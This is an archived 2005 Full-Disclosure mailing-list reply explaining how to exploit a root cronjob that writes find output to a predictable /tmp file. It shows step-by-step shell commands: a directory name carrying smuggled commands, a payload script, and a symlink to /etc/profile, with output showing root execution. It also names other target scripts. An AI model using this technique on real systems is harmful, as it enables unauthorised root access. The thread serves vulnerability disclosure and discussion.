[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Symlink attack techniques

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Symlink attack techniques
From: H D Moore <fdlist@xxxxxxxxxxxxxxxxxx>
Date: Wed, 14 Dec 2005 21:16:39 -0600

Assuming that the find command will report a directory or file that you 
control, 
you can use the symlink to overwrite a shell script, and then place shell 
commands
into your file name:

$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chmod +x /tmp/root.sh

$ ln -s /etc/profile /tmp/report

# find / [args]  > /tmp/report
# su - (executes /etc/profile)
/tmp/report: line 1: cd..: command not found
/tmp/report: line 1: ./uid=0(root): No such file or directory

Some potential shell scripts include /etc/profile, /etc/cron.*/*, and 
/etc/profiles.d/*.

-HD

On Wednesday 14 December 2005 16:42, Werner Schalk wrote:
> On a Unix system there is a cronjob set up which will use the find
> command to create some sort of report and output that report to a
> predictable file in /tmp. So basically the command in the crontab is
> something like:
>
> 15 4  * * 6     root    /usr/bin/find [command] > /tmp/report.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Symlink attack techniques
  - From: Werner Schalk

References:
- [Full-disclosure] Symlink attack techniques
  - From: Werner Schalk

Prev by Date: Re: [Full-disclosure] Inside AV engines?
Next by Date: [Full-disclosure] Symlink attack techniques
Previous by thread: [Full-disclosure] Symlink attack techniques
Next by thread: Re: [Full-disclosure] Symlink attack techniques
Index(es):
- Date
- Thread